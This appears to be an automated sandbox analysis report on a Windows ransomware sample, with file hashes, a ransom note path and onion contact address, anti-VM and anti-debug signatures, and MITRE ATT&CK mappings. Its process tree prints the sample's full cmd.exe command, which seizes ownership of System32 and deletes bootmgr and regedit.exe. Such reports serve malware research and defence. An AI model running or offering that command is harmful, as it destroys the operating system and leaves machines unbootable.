Analysis
-
max time kernel
140s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 02:26
Behavioral task
behavioral1
Sample
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Resource
win7-20240903-en
General
-
Target
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
-
Size
3.1MB
-
MD5
6a85d0ba4d1db63d390b7a071d60e0ef
-
SHA1
79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
-
SHA256
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
-
SHA512
16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
-
SSDEEP
49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
http://mail2tor2zyjdctd.onion/
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Renames multiple (196) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 2148 takeown.exe 2284 icacls.exe 604 takeown.exe 2928 takeown.exe 892 icacls.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
takeown.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 604 takeown.exe 2928 takeown.exe 892 icacls.exe 2148 takeown.exe 2284 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/2084-19-0x0000000001120000-0x0000000001950000-memory.dmp themida behavioral1/memory/2084-20-0x0000000001120000-0x0000000001950000-memory.dmp themida -
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exepid process 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.execmd.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Token: SeDebugPrivilege 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Token: SeTakeOwnershipPrivilege 2928 takeown.exe Token: SeTakeOwnershipPrivilege 2148 takeown.exe Token: SeTakeOwnershipPrivilege 604 takeown.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.execmd.exedescription pid process target process PID 2084 wrote to memory of 316 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 2084 wrote to memory of 316 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 2084 wrote to memory of 316 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 2084 wrote to memory of 316 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 316 wrote to memory of 2928 316 cmd.exe takeown.exe PID 316 wrote to memory of 2928 316 cmd.exe takeown.exe PID 316 wrote to memory of 2928 316 cmd.exe takeown.exe PID 316 wrote to memory of 2928 316 cmd.exe takeown.exe PID 316 wrote to memory of 892 316 cmd.exe icacls.exe PID 316 wrote to memory of 892 316 cmd.exe icacls.exe PID 316 wrote to memory of 892 316 cmd.exe icacls.exe PID 316 wrote to memory of 892 316 cmd.exe icacls.exe PID 316 wrote to memory of 2148 316 cmd.exe takeown.exe PID 316 wrote to memory of 2148 316 cmd.exe takeown.exe PID 316 wrote to memory of 2148 316 cmd.exe takeown.exe PID 316 wrote to memory of 2148 316 cmd.exe takeown.exe PID 316 wrote to memory of 2284 316 cmd.exe icacls.exe PID 316 wrote to memory of 2284 316 cmd.exe icacls.exe PID 316 wrote to memory of 2284 316 cmd.exe icacls.exe PID 316 wrote to memory of 2284 316 cmd.exe icacls.exe PID 316 wrote to memory of 604 316 cmd.exe takeown.exe PID 316 wrote to memory of 604 316 cmd.exe takeown.exe PID 316 wrote to memory of 604 316 cmd.exe takeown.exe PID 316 wrote to memory of 604 316 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2928 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:892 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2148 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2284 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:604
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172
-
Filesize
16B
MD52caa6f3c95f6ec6bba5b54344938efa0
SHA12d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA25616ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA5124141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00